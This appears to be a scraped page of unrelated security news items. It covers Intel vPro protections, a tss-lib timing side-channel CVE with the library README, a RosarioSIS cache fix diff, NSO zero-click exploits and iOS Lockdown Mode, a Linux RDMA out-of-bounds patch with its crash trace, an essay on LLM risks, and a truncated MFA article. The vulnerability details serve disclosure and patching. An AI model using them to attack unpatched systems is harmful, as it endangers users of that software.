While Intel is building more hardware protections directly into the chips, enterprises still need a strategy for applying security updates on these components.

Intel is taking a new tack with its latest commercial PC chips announced last month: Instead of touting speed and performance, the company is emphasizing the chip's security features.

The chip giant has been working with security vendors in recent years to implement hardware-level protections on the chips to protect laptops from ransomware and malware attacks. The new 13th Gen Intel Core vPro processors include under-the-hood improvements at the firmware and operating system levels that boost system protection and management, the company says.

Attackers will find it harder to compromise the firmware through hardware exploits because many of the new upgrades are in the chip's firmware and BIOS, and the chip's security layer contains prevention and detection capabilities. For example, there is a better handshake between the firmware and Microsoft's virtualization technology in Windows 11 to prevent intrusions, says Mike Nordquist, vice president and general manager of Intel Business Client Product Planning and Architecture. He notes that Hyper-V on Windows 11 works with vPro to store secrets and credentials in a virtual container.

"If you only have detection, you keep letting everyone in your front door. You are never really going to address the problem. You have to figure out how to close that front door," Nordquist says.

**Secure Enclaves on Chip**

Intel's vPro now provides the hooks for critical applications running on Windows 11 to be encrypted in memory through a feature called Total Memory Encryption-Multi-Key.

Microsoft provides the ability to encrypt storage drives, but it recently added the ability to encrypt data in memory. Intel's newer Core chips, code-named Raptor Lake, come ready for that feature; they have 16 memory slots in which applications can be encrypted, with separate keys needed to unlock the data.

The feature helps prevent side-channel attacks, which typically involve breaking into a chip and stealing unencrypted data from sources that include memory. Hackers would need a key to unlock the data, and isolating applications in 16 different slots makes it an even bigger challenge to steal data.

Applications are encrypted in virtual machines created in the memory slots, and system administrators can enable or disable the feature.

"We're not encrypting the entirety of the memory, because if you don't need to do it, it is basically going to impact performance," says Venky Venkateswaran, director of client product security and virtualization architecture and definition for Intel's Client Computing Group.

A new vPro technology to prevent security threats, TDT (threat detection technology), uses libraries baked into the chips to identify abnormal activity and security threats on a PC. The library assesses telemetry coming from CPUs that may be related to abnormal processing activity as a result of a security breach.

For example, the libraries can tell if a cryptocurrency mining application is calling on an abnormally high number of crypto instructions. That information is sent to security applications, which use that data in their engine to triage and stop threats.

The libraries have models tuned to weed out ransomware and other types of attack.

"We have low-level telemetry and an AI engine of sorts that can weed out the noise ... you don't want to have false positives," Venkateswaran says.

Intel is partnering with several antivirus vendors, including Microsoft, CrowdStrike, Eset, and Check Point Technologies, to integrate TDT features into security software. This way, the vendors get access to hardware telemetry to detect threats in virtual machines. For example, Eset Endpoint Security will be able to detect ransomware through Intel's performance monitoring unit (PMU), which sits underneath applications in the operating system.

**Patching Components**

Intel is working with PC makers to bring a standard methodology to patch PCs, and it is not putting all the eggs in one basket when it comes to securing systems. The focus is on establishing islands of security for different hardware components.

"There's no reason the BIOS needs to be able to have access to the OS memory. There is no value-add in it," Nordquist says. "So we actually deprivileged that at a base level ... and we did an enhanced level where we could really lock it down good. On vPro, that is a little bit better."

Attack vectors for PCs are different from servers and require a different security profile, he says.

"Before, PCs were designed to make sure the OS was protected. What if I want to protect something from the OS? What if I do not trust the hypervisor? I need the next level of security to deal with that," Nordquist says.

**Squashing Chip Bugs**

As a sign that Intel is serious about making hardware security a priority, the company last year awarded $935,751 in bug bounties to security researchers disclosing security flaws in its chips and firmware. The company has paid a total of $4 million since the inception of the program in 2017, according to its most recent annual security research report.

"These firmware updates are usually released on Intel's website, and the device vendor is responsible for distributing them. Some of them can be delivered automatically by Microsoft Windows Update, but only limited vendors can update their devices through it," says Alex Matrosov, founder of Binarly, whose firmware security platform helps people discover and patch hardware vulnerabilities. "CISOs should start paying more attention to threats and device ... security below the operating system. Every mature enterprise organization should invest in firmware security and specifically vulnerability management for their device security pasture."

Intel Prioritizes Security in Latest vPro Chips

io.finnet tss-lib before 2.0.0 can leak the lambda value of a private key via a timing side-channel attack because it relies on Go big.Int, which is not constant time for Cmp, modular exponentiation, or modular inverse. An example leak is in crypto/paillier/paillier.go. (bnb-chain/tss-lib and thorchain/tss are also affected.)

**Multi-Party Threshold Signature Scheme**

  

Permissively MIT Licensed.

Note! This is a library for developers. You may find a TSS tool that you can use with the Binance Chain CLI here.

**Introduction**

This is an implementation of multi-party {t,n}-threshold ECDSA (Elliptic Curve Digital Signature Algorithm) based on Gennaro and Goldfeder CCS 2018 1 and EdDSA (Edwards-curve Digital Signature Algorithm) following a similar approach.

This library includes three protocols:

*   Key Generation for creating secret shares with no trusted dealer ("keygen").
*   Signing for using the secret shares to generate a signature ("signing").
*   Dynamic Groups to change the group of participants while keeping the secret ("resharing").

⚠️ Do not miss these important notes on implementing this library securely

**Rationale**

ECDSA is used extensively for crypto-currencies such as Bitcoin, Ethereum (secp256k1 curve), NEO (NIST P-256 curve) and many more.

EdDSA is used extensively for crypto-currencies such as Cardano, Aeternity, Stellar Lumens and many more.

For such currencies this technique may be used to create crypto wallets where multiple parties must collaborate to sign transactions. See MultiSig Use Cases

One secret share per key/address is stored locally by each participant and these are kept safe by the protocol – they are never revealed to others at any time. Moreover, there is no trusted dealer of the shares.

In contrast to MultiSig solutions, transactions produced by TSS preserve the privacy of the signers by not revealing which t+1 participants were involved in their signing.

There is also a performance bonus in that blockchain nodes may check the validity of a signature without any extra MultiSig logic or processing.

**Usage**

You should start by creating an instance of a LocalParty and giving it the arguments that it needs.

The LocalParty that you use should be from the keygen, signing or resharing package depending on what you want to do.

**Setup**

// When using the keygen party it is recommended that you pre-compute the "safe primes" and Paillier secret beforehand because this can take some time.
// This code will generate those parameters using a concurrency limit equal to the number of available CPU cores.
preParams, \_ := keygen.GeneratePreParams(1 \* time.Minute)

// Create a \`\*PartyID\` for each participating peer on the network (you should call \`tss.NewPartyID\` for each one)
parties := tss.SortPartyIDs(getParticipantPartyIDs())

// Set up the parameters
// Note: The \`id\` and \`moniker\` fields are for convenience to allow you to easily track participants.
// The \`id\` should be a unique string representing this party in the network and \`moniker\` can be anything (even left blank).
// The \`uniqueKey\` is a unique identifying key for this peer (such as its p2p public key) as a big.Int.
thisParty := tss.NewPartyID(id, moniker, uniqueKey)
ctx := tss.NewPeerContext(parties)

// Select an elliptic curve
// use ECDSA
curve := tss.S256()
// or use EdDSA
// curve := tss.Edwards()

params := tss.NewParameters(curve, ctx, thisParty, len(parties), threshold)

// You should keep a local mapping of \`id\` strings to \`\*PartyID\` instances so that an incoming message can have its origin party's \`\*PartyID\` recovered for passing to \`UpdateFromBytes\` (see below)
partyIDMap := make(map\[string\]\*PartyID)
for \_, id := range parties {
    partyIDMap\[id.Id\] \= id
}

**Keygen**

Use the keygen.LocalParty for the keygen protocol. The save data you receive through the endCh upon completion of the protocol should be persisted to secure storage.

party := keygen.NewLocalParty(params, outCh, endCh, preParams) // Omit the last arg to compute the pre-params in round 1
go func() {
    err := party.Start()
    // handle err ...
}()

**Signing**

Use the signing.LocalParty for signing and provide it with a message to sign. It requires the key data obtained from the keygen protocol. The signature will be sent through the endCh once completed.

Please note that t+1 signers are required to sign a message and for optimal usage no more than this should be involved. Each signer should have the same view of who the t+1 signers are.

party := signing.NewLocalParty(message, params, ourKeyData, outCh, endCh)
go func() {
    err := party.Start()
    // handle err ...
}()

**Re-Sharing**

Use the resharing.LocalParty to re-distribute the secret shares. The save data received through the endCh should overwrite the existing key data in storage, or write new data if the party is receiving a new share.

Please note that ReSharingParameters is used to give this Party more context about the re-sharing that should be carried out.

party := resharing.NewLocalParty(params, ourKeyData, outCh, endCh)
go func() {
    err := party.Start()
    // handle err ...
}()

⚠️ During re-sharing the key data may be modified during the rounds. Do not ever overwrite any data saved on disk until the final struct has been received through the end channel.

**Messaging**

In these examples the outCh will collect outgoing messages from the party and the endCh will receive save data or a signature when the protocol is complete.

During the protocol you should provide the party with updates received from other participating parties on the network.

A Party has two thread-safe methods on it for receiving updates.

// The main entry point when updating a party's state from the wire
UpdateFromBytes(wireBytes \[\]byte, from \*tss.PartyID, isBroadcast bool) (ok bool, err \*tss.Error)
// You may use this entry point to update a party's state when running locally or in tests
Update(msg tss.ParsedMessage) (ok bool, err \*tss.Error)

And a tss.Message has the following two methods for converting messages to data for the wire:

// Returns the encoded message bytes to send over the wire along with routing information
WireBytes() (\[\]byte, \*tss.MessageRouting, error)
// Returns the protobuf wrapper message struct, used only in some exceptional scenarios (i.e. mobile apps)
WireMsg() \*tss.MessageWrapper

In a typical use case, it is expected that a transport implementation will consume message bytes via the out channel of the local Party, send them to the destination(s) specified in the result of msg.GetTo(), and pass them to UpdateFromBytes on the receiving end.

This way there is no need to deal with Marshal/Unmarshalling Protocol Buffers to implement a transport.

**How to use this securely**

⚠️ This section is important. Be sure to read it!

The transport for messaging is left to the application layer and is not provided by this library. Each one of the following paragraphs should be read and followed carefully as it is crucial that you implement a secure transport to ensure safety of the protocol.

When you build a transport, it should offer a broadcast channel as well as point-to-point channels connecting every pair of parties. Your transport should also employ suitable end-to-end encryption (TLS with an AEAD cipher is recommended) between parties to ensure that a party can only read the messages sent to it.

Within your transport, each message should be wrapped with a **session ID** that is unique to a single run of the keygen, signing or re-sharing rounds. This session ID should be agreed upon out-of-band and known only by the participating parties before the rounds begin. Upon receiving any message, your program should make sure that the received session ID matches the one that was agreed upon at the start.

Additionally, there should be a mechanism in your transport to allow for "reliable broadcasts", meaning parties can broadcast a message to other parties such that it's guaranteed that each one receives the same message. There are several examples of algorithms online that do this by sharing and comparing hashes of received messages.

Timeouts and errors should be handled by your application. The method WaitingFor may be called on a Party to get the set of other parties that it is still waiting for messages from. You may also get the set of culprit parties that caused an error from a *tss.Error.

**Security Audit**

A full review of this library was carried out by Kudelski Security and their final report was made available in October, 2019. A copy of this report audit-binance-tss-lib-final-20191018.pdf may be found in the v1.0.0 release notes of this repository.

**References**

\[1\] https://eprint.iacr.org/2019/114.pdf

CVE-2023-26557: GitHub - bnb-chain/tss-lib at v1.3.5

RosarioSIS prior to version 10.9.3 has a vulnerability that allows a user to return to a page containing personally identifiable information (PII) and sensitive information even after logging out of the application by using the browser's back button.

**RosarioSIS improper access control vulnerability**

Moderate severity GitHub Reviewed Published Apr 21, 2023 to the GitHub Advisory Database • Updated Apr 24, 2023

GHSA-g66v-3v62-g375: RosarioSIS improper access control vulnerability

Categories: Apple
Categories: Exploits and vulnerabilities
Categories: News
Tags: Apple

Tags:  Lockdown Mode

Tags:  NSO

Tags:  PWNYOURHOME

Tags:  FINDMYPWN

Tags:  LATENTIMAGE

Apple's Lockdown Mode has shown that it can do what it was designed to do by notifying users about an NSO exploit.



(Read more...)




The post iOS Lockdown Mode effective against NSO zero-click exploit appeared first on Malwarebytes Labs.

Apple’s Lockdown Mode feature alerted a victim to one of the latest NSO exploits, according to a report by Citizen Lab.

_image courtesy of Citizen Lab_

This is a huge deal since it shows how useful Lockdown Mode can be, even against exploits developed by one of the world’s most notorious commercial spyware producers.

Pegasus spyware, developed by NSO Group, has featured in many news stories, after being found to have been used against journalists, politicians, State Department employees, embassy workers, and activists.

We talked about Pegasus infections in our podcast Lock and Code, which can be listened to in full here:

As Pegasus has become publicly scrutinized, NSO Group has expanded its product line. Citizen Lab found several new zero-click chains that it was able to tie to the NSO group with high confidence.

The report describes three of them in detail:

*   **PWNYOURHOME**: An iOS 15 and iOS 16 zero-click exploit which involves the HomeKit functionality built into iPhones and works even if the victim has never configured a “Home” inside HomeKit.
*   **FINDMYPWN**: An iOS 15 zero-day, zero-click exploit which is associated with the iPhone’s built-in Find My functionality.
*   **LATENTIMAGE**: An iOS 15 zero-click exploit which is also believed to use the iPhone’s Find My feature.

The use of multiple attack surfaces can be handled in two very different ways. You can play a game of whack a mole and patch the vulnerabilities as they get uncovered, which is certainly necessary and common practice, but it has the disadvantage of being responsive rather than preventive. And the report also stipulates that NSO is getting better at hiding itself and its traces on infected devices, which makes it harder to find and analyze the exploits they used.

The other way of minimizing the risk of exploits is to build with security in mind. Think of design decisions like memory safe programming languages, and sandboxing applications so a vulnerability in one does not lead to a compromised device and stays limited to the app. But also features like Apple’s Lockdown Mode which puts an iPhone into a state where it is more difficult to attack.

Lockdown Mode is available for iOS 16, iPadOS 16 and macOS Ventura. It is designed to provide a safer environment for users that are at a higher risk.

You could say it was introduced with Pegasus in mind. And although Apple refers to Lockdown Mode as "an extreme, optional protection," the limitations don't actually sound particularly difficult to live with.

*   **Messages**: Most message attachment types other than images are blocked and some features, like link previews, are unavailable.
*   **Web browsing**: Certain complex web technologies, like just-in-time (JIT) JavaScript compilation, are disabled unless the user excludes a trusted site from Lockdown Mode.
*   **Apple services**: Incoming invitations and service requests, including **FaceTime** calls, are blocked if the user has not previously sent the initiator a call or request.
*   **Wired connections** with a computer or accessory are blocked when iPhone is locked.

Configuration profiles cannot be installed, and the device cannot enroll into mobile device management (MDM), while Lockdown Mode is turned on. A device that was enrolled in Mobile Device Management before Lockdown Mode is enabled remains managed. System administrators can install and remove configuration profiles on that device.

Even though it’s very good news that Lockdown Mode proved it was able to notify a target about an ongoing attack, there are some caveats. The Citizen Lab report also mentions that NSO may have figured out a way to correct the notification issue, since Citizen Lab has had no new reports about it. NSO could have done this, for example, by fingerprinting Lockdown Mode. And since Lockdown Mode is not available for iOS 15 it only provides protection against the PWNYOURHOME exploit. The others didn’t work on iOS 16 anyway.

**Enabling Lockdown mode**

So, how do you turn on Lockdown Mode? If you consider yourself a target for commercial spyware or are willing to live with some minor inconveniences for a higher level of security, here’s what you can do.

How to enable Lockdown Mode on iPhone or iPad:

*   Open the **Settings** app
*   Tap **Privacy & Security**
*   Under **Security**, tap **Lockdown Mode** and tap **Turn On Lockdown Mode**
*   Tap **Turn On Lockdown Mode**
*   Tap **Turn On & Restart**, then enter your device passcode.

And you’re all set. If you feel that the limitations are a bit too strict for your convenience, don’t turn it off immediately because there are ways to exclude apps or websites from Lockdown Mode. While your device is in Lockdown Mode, you can exclude an app or website in Safari from being impacted and limited. Exclude only trusted apps or websites and only if necessary.

To exclude a website while browsing: Tap the **Page Settings** button , then tap **Website Settings**. Then turn off Lockdown Mode.

To exclude an app or edit your excluded websites:

*   Open the **Settings** app
*   Tap **Privacy & Security**
*   Under **Security**, tap **Lockdown Mode**
*   Tap **Configure Web Browsing**
*   Exclude websites or apps from Lockdown Mode on iPhone

To exclude an app, turn that app off in the menu. Only apps that you have opened since enabling Lockdown Mode and which have limited functionality appear on this list.

To edit your excluded websites, tap Excluded Safari Websites > Edit.

**We don’t just report on iOS security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your iOS devices by downloading Malwarebytes for iOS today.

iOS Lockdown Mode effective against NSO zero-click exploit

Improper Access Control in GitHub repository francoisjacquet/rosariosis prior to 10.9.3.

@@ -497,27 +497,31 @@ var ajaxPopState = function() {

\* @link https://stackoverflow.com/questions/17432899/javascript-bfcache-pageshow-event-event-persisted-always-set-to-false

\* @link https://huntr.dev/bounties/efe6ef47-d17c-4773-933a-4836c32db85c/

\*/

if (window.performance && (performance.navigation.type \== 2

|| (performance.getEntriesByType

&& performance.getEntriesByType("navigation")\[0\]

&& performance.getEntriesByType("navigation")\[0\].type \=== 'back\_forward'))) {

location.reload();

}

function browserHistoryCacheBuster(event) {

if (location.href.indexOf('Modules.php?') \=== \-1) {

// Current page is not Modules.php, no login required, skip.

return;

}

  

window.onpageshow\=function(event) {

/\*\*

\* Same as above for Safari (does not execute Javascript on history back)

\* persisted indicates if the document is loading from a cache (not reliable)

\*

\* @link https://web.dev/bfcache/

\*/

if (event.persisted

// persisted indicates if the document is loading from a cache (not reliable)

if ((event && event.persisted)

|| window.performance && (performance.navigation.type \== 2

|| (performance.getEntriesByType

&& performance.getEntriesByType("navigation")\[0\]

&& performance.getEntriesByType("navigation")\[0\].type \=== 'back\_forward'))) {

location.reload();

}

}

  

browserHistoryCacheBuster();

  

/\*\*

\* onpageshow: Same as above for Safari (does not execute Javascript on history back)

\*

\* @link https://web.dev/bfcache/

\*/

window.onpageshow\=function(event) {

browserHistoryCacheBuster(event);

};

  

// onunload: Fix for Firefox to execute Javascript on history back.

CVE-2023-2202: Security Fix browser loading cached page when page full reload (F5) +… · francoisjacquet/rosariosis@6433946

**DENVER****,** **April 20, 2023** **/PRNewswire/ --** Red Canary, a leader in managed detection and response, launched Red Canary Readiness, a new portfolio of offerings that gives teams a whole new way to train and prepare for incidents. Now any company can improve their incident response preparedness by empowering their security teams to practice and validate the skills, processes, and playbooks required to quickly respond to cyber and business continuity threats.

The initial Readiness product is Readiness Exercises, a first-of-its-kind continuous learning platform that combines training, tabletops, and atomic tests in one experience. With Readiness Exercises available today, cybersecurity professionals get on-demand content and expert training at their fingertips, making it easy for companies to skill up employees, no matter where they are.

**Enterprises must maintain a skilled and ready workforce to face today's top cybersecurity threats**

Adversaries are becoming faster and more efficient at distributing and scaling cyberattacks. Rather than infrequent and one-size-fits-all training, continuous learning is critical to keep pace with the evolving threat landscape.

Readiness scenarios are ripped from the headlines and informed by Red Canary's leading threat intelligence and adversary research from its Managed Detection and Response (MDR) solution, which conducts millions of investigations per year. This expertise is mapped to industry-standard frameworks, such as NIST and MITRE ATT&CK®, to ensure teams are practicing the most critical scenarios. Training can be self-guided or facilitated, ranging from 20 minutes to 2 hours, and prepares teams to face incidents involving business email compromise, ransomware, and other threats including Qbot and Raspberry Robin.

"We have previously invested in cybersecurity training but have had mixed results. The exercises don't always relate to the threats that matter most to us, and the lessons are infrequent and don't always stick," said Michael Strong, Chief Security Officer, GCI. "This is why we are so excited about Readiness Exercises. Now our team can continuously train and benchmark our progress, learning from the Red Canary team who respond to real-world threats daily. It gives me confidence knowing that we're better prepared for the next threat that comes our way."

"Just having an incident response plan and a set of playbooks is no longer enough. That plan and those playbooks must be put to the test regularly and refined to keep up with evolving threats," wrote Jess Burn, Sr. Analyst, Forrester in an April 2022 blog post.

Readiness Exercises foster continuous learning, which drives both employee and business success through:

*   **Continuously improving your readiness:** Benchmark current skill levels against industry standards through frequent feedback and scoring. Onboard new team members and establish a culture of consistent skill improvement.
*   **Training for real-world threats:** Continuously practice and validate team preparedness against realistic scenarios based on trending adversary groups, tools, and MITRE ATT&CK® techniques.
*   **Get training, tabletops, and atomic tests in one experience:** Bring together disparate learning tools and run them in your environment to maximize their relevance and impact.

"We're excited to announce the launch of Readiness Exercises, a comprehensive solution that combines tabletop exercises, cybersecurity training, and atomic testing into a seamless, continuous learning experience," said Brian Beyer, CEO of Red Canary. "With this innovative product, we're reinventing the way organizations approach cybersecurity training and prepare for real-world threats."

**Learn more**

*   Learn more about Readiness
*   Watch the Readiness Exercises video
*   Register for the Readiness webinar

**Availability** 

Red Canary Readiness launched today, with Red Canary Readiness Exercises generally available now.

**About Red Canary**

Red Canary is a leader in managed detection and response (MDR). We serve companies of every size and industry, focusing on finding and stopping threats before they can have a negative impact. As the security ally for nearly 1,000 organizations, we provide MDR across our customers' cloud workloads, identities, SaaS applications, networks, and endpoints. For more information about Red Canary, visit: https://www.redcanary.com.

SOURCE Red Canary

Red Canary Announces Readiness

A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege.

From: Patrisious Haddad <phaddad@xxxxxxxxxx>

resolve\_prepare\_src() changes the destination address of the id,
regardless of success, and on failure zeroes it out.

Instead on function failure keep the original destination address
of the id.

Since the id could have been already added to the cm id tree and
zeroing its destination address, could result in a key mismatch or
multiple ids having the same key(zero) in the tree which could lead to:

BUG: KASAN: slab-out-of-bounds in compare\_netdev\_and\_ip.isra.0+0x25/0x120 drivers/infiniband/core/cma.c:473
Read of size 4 at addr ffff88800920d9e4 by task syz-executor.4/14865

CPU: 2 PID: 14865 Comm: syz-executor.4 Not tainted 5.19.0-rc2 #21
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014
Call Trace:
 <TASK>
 \_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
 dump\_stack\_lvl+0x6e/0x91 lib/dump\_stack.c:106
 print\_address\_description mm/kasan/report.c:313 \[inline\]
 print\_report.cold+0xff/0x68e mm/kasan/report.c:429
 kasan\_report+0xa8/0x130 mm/kasan/report.c:491
 compare\_netdev\_and\_ip.isra.0+0x25/0x120 drivers/infiniband/core/cma.c:473
 cma\_add\_id\_to\_tree drivers/infiniband/core/cma.c:506 \[inline\]
 rdma\_resolve\_route+0xbc4/0x1560 drivers/infiniband/core/cma.c:3303
 ucma\_resolve\_route+0xe4/0x150 drivers/infiniband/core/ucma.c:746
 ucma\_write+0x19f/0x280 drivers/infiniband/core/ucma.c:1744
 vfs\_write fs/read\_write.c:589 \[inline\]
 vfs\_write+0x181/0x580 fs/read\_write.c:571
 ksys\_write+0x1a1/0x1e0 fs/read\_write.c:644
 do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]
 do\_syscall\_64+0x3d/0x90 arch/x86/entry/common.c:80
 entry\_SYSCALL\_64\_after\_hwframe+0x46/0xb0
RIP: 0033:0x7f2afbe8c89d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 bc ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f2afcf1ec28 EFLAGS: 00000246 ORIG\_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 00007f2afbfabf60 RCX: 00007f2afbe8c89d
RDX: 0000000000000010 RSI: 0000000020000100 RDI: 0000000000000003
RBP: 00007f2afbef910d R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007ffcdc77c66f R14: 00007f2afbfabf60 R15: 00007f2afcf1edc0
 </TASK>

Fixes: 19b752a19dce ("IB/cma: Allow port reuse for rdma\_id")
Signed-off-by: Patrisious Haddad <phaddad@xxxxxxxxxx>
Reviewed-by: Maor Gottlieb <maorg@xxxxxxxxxx>
Reported-by: Wei Chen <harperchen1110@xxxxxxxxx>
Signed-off-by: Leon Romanovsky <leonro@xxxxxxxxxx>
---
 drivers/infiniband/core/cma.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
index 1fca0a24f30f..2d4c391e36a9 100644
--- a/drivers/infiniband/core/cma.c
+++ b/drivers/infiniband/core/cma.c
@@ -3584,8 +3584,11 @@ static int resolve\_prepare\_src(struct rdma\_id\_private \*id\_priv,
 			       struct sockaddr \*src\_addr,
 			       const struct sockaddr \*dst\_addr)
 {
+	struct sockaddr org\_addr = {};
 	int ret;
 
+	memcpy(&org\_addr, cma\_dst\_addr(id\_priv),
+	       rdma\_addr\_size(cma\_dst\_addr(id\_priv)));
 	memcpy(cma\_dst\_addr(id\_priv), dst\_addr, rdma\_addr\_size(dst\_addr));
 	if (!cma\_comp\_exch(id\_priv, RDMA\_CM\_ADDR\_BOUND, RDMA\_CM\_ADDR\_QUERY)) {
 		/\* For a well behaved ULP state will be RDMA\_CM\_IDLE \*/
@@ -3608,7 +3611,7 @@ static int resolve\_prepare\_src(struct rdma\_id\_private \*id\_priv,
 err\_state:
 	cma\_comp\_exch(id\_priv, RDMA\_CM\_ADDR\_QUERY, RDMA\_CM\_ADDR\_BOUND);
 err\_dst:
-	memset(cma\_dst\_addr(id\_priv), 0, rdma\_addr\_size(dst\_addr));
+	memcpy(cma\_dst\_addr(id\_priv), &org\_addr, rdma\_addr\_size(&org\_addr));
 	return ret;
 }
 
-- 
2.38.1

CVE-2023-2176: Fix resolve_prepare_src error cleanup — Linux RDMA and InfiniBand development

Today's LLMs pose too many trust and security risks.

_The Berryville Institute of Machine Learning (BIML) recently attended_ _Calypso AI’s Accelerate AI 2023_ _conference in Washington, DC. The meeting included practitioners from both government and industry, regulators, and academics. I participated in a very timely panel entitled "Emerging Risks and Opportunities of LLMs in the NATSEC and Beyond." That panel spurred this article._

_None of the content in this column was created by an LLM._

Large language models (LLMs) are a kind of machine learning system that has taken the world by storm. ChaptGPT (aka GPT-3.5), an LLM produced and fielded by OpenAI, is one of the most pervasive and popular of the many generative AI models for text. Other generative models include the image generators Dall-E, Midjourney, and Stable Diffusion, and the code generator Copilot.

LLMs and other generative tools present incredible opportunities for applications, and the rush to field such systems is in full gallop. LLMs have the potential to be lots of fun, solve hard problems in science, help with the thorny problems of knowledge management, create interesting content, and most importantly in my view, move the world a little closer to artificial general intelligence (AGI) and a theory of representation that produces massive cognitive science breakthroughs.

But using today's nascent LLMs — and any generative AI tools — comes with real risks.

**Of Parrots and Pollution**

LLMs are trained on massive corpuses of information (300 billion words, mostly scraped from the Internet) and use auto-association to predict the next word in a sentence. As such, most scientists agree that LLMs do not really "understand" anything or do any real thinking. Rather, they are "stochastic parrots," as some researchers call them. LLMs still do generate impressive streams of text, in context, and in an often useful and deeply surprising manner.

Feedback loops are an important class of problem in all kinds of ML models (and one that BIML introduced several years ago as “\[raw:8:looping\]”). Here is what we said at the time:

_Model confounded by subtle feedback loops. If data output from the model are later used as input back into the same model, what happens? Note that this is rumored to have happened to Google translate in the early days when translations of pages made by the machine were used to train the machine itself. Hilarity ensued. To this day, Google restricts some translated search results through its own policies_.

Imagine what will happen when a majority of what can be easily scraped from the Internet is generated by AI models of dubious quality, and then these LLMs start to eat their own tails. Talk about information pollution.

Some AI researchers and information security professionals are already deeply worried about information pollution today, but an infinite spewing information pollution pipeline sounds bad.

**Mansplaining-as-a-Service**

LLMs are very good B.S. artists. These models regularly express incorrect opinions and alternative facts with great confidence, and often make up information to justify their answers in a conversation (including pretend scientific references). Imagine what happens when average knowledge as scraped from the Internet — which includes lots of wrong things — is used to create new content.

The ultimate "reply guy" is not who we need writing news stories for us in the future. Facts actually do matter.

**Mirroring Broken Security**

LLMs are often trained on data that is biased in many ways. Sexist, racist, xenophobic, and misogynistic systems can and will be modeled from data sets originally collected when society was less progressive. Bias is a serious issue in LLMs, and one that operational Band-Aids are unlikely to fix.

**Trusting Deepfakes**

Deepfakes are a side effect of generative AI that has been discussed for some time. Fakes or spoofing are always a risk in security, but the capacity to make higher-quality fakes that are easy to believe is here. There are some obvious worst-case scenarios: moving markets, causing wars, inflaming cultural divides, and so on. Careful where that video came from.

**Automating Everything**

Generative models like LLMs have the capacity to replace lots of jobs, including low-level white collar jobs. Millions of people get plenty of satisfaction out of their jobs, but what if all of those jobs are willy-nilly replaced by ML systems that are cheaper to operate? We already see this with some writing content-creation jobs in local sports stories and marketing copy, for example. Should LLMs be writing our articles? Should they be practicing law? How about doing medical diagnosis?

**Using a Tool for Evil**

Generative AI can create some fun stuff. If you haven’t played with ChapGPT, you should give it a shot. I haven’t had this much fun with new technology since I got my first Apple \]\[+ in 1981, or since Java applets came out in 1995.

But the power of generative AI can be used for evil as well. For example, what if we put ML to the task of designing a novel virus with the propagation capability of COVID and the delayed onset parameters of rabies? Or how about the task of creating a plant with pollen that is also a neurotoxin. If I can think up these dastardly things in my kitchen, what happens when a real evil person starts brainstorming with ML?

Tools have no intrinsic morality or ethics. And for the record, the idea of "protecting prompts" is a pretend solution akin to protecting supercomputer access with command-line filtering.

**Holding Information in a Broken Cup**

Data moats are a thing now. That’s because if an ML model (with the help of humans) can get to your data and learn how to profitably parrot what you do by training on your data, it will. This leads to multiple risks best solved by carefully protecting your data sets instead of cramming them unto an ML model and fielding the model to the general public. In the gold rush world of ML, the gold is data.

Protecting data is harder than it sounds. Think how the government's current information classification system can't always protect classified information. Clearly, protecting sensitive and confidential information is already a huge challenge, so imagine what happens when we intentionally train up our ML systems on confidential information and set them out into the world.

Extraction and transfer attacks exist today, so be careful what you pour in your ML cup.

**What Should We Do About LLM Risk?**

So should we put some kind of magic moratorium on ML research for a few months as some technologists have self-servingly suggested? No, that's just silly. What we need to do is recognize these risks and face them directly.

The good news is that an entire industry is being built around securing ML systems, which I call machine learning security or MLsec. Check out what these new hot startups are building to control ML risk — but do so with a skeptical and well-informed eye.

Expert Insight: Dangers of Using Large Language Models Before They Are Baked

Overcoming the limitations of consumer MFA with a new flavor of passwordless.

Twitter recently disabled SMS-based two-factor authentication (2FA) except for Twitter Blue subscribers. While the intended results may be cost-savings and boosting the number of subscribers, the decision is likely to have unintended security consequences. Even some tech-savvy people who know and care about security find Twitter's 2FA alternatives awkward enough to delay until they are forced into it, so Twitter's new policy will likely result in fewer accounts using 2FA. Educating users about how to set up authenticator apps and security keys is one solution. But that's analogous to building a faster horse.

Fundamentally, the enterprise 2FA playbook cannot be applied to consumer scenarios in equal measure because consumers can vote with their feet. Any added step will send them galloping into the arms of the competition. Thus, the Twitter news should be a call for disruption, and for solutions that protect consumer identities without introducing friction. I believe that technology is passkeys when available uniformly across the digital landscape.

**The State of Consumer MFA**

It’s broadly accepted that any multifactor authentication (MFA) is better than no MFA (I’ll use MFA here to mean authenticating your identity with two or more factors). MFA solutions prevent bad actors from accessing resources using only a victim's primary credentials. Our CISO once observed that MFA and adaptive authentication would have prevented 95% of the breaches she has seen.

But not all MFA is created equal. Some factors are weaker than others, particularly against targeted attacks. Security questions, SMS, voice, and email-based one-time passwords are considered low-assurance factors. All these factors are vulnerable to phishing. Attackers can bypass weaker factors by "guessing" the authenticator code; intercepting the code-containing SMS; or creating "alert fatigue" by bombarding the user with messages until they complete the MFA challenge.

**MFA Bypass Attacks**

Recent research found more than 113 million MFA bypass (registration required) attempts against consumer and SaaS applications over a 90-day period, representing the highest baseline level of attacks of any year on record. Given what we know about weaker factors, you'd be forgiven for thinking Twitter's decision to disable text-based authentication is a good one. But as with most things in identity, there is more complexity that meets the eye, particularly when we look at MFA adoption issues.

**The Trouble With MFA Adoption**

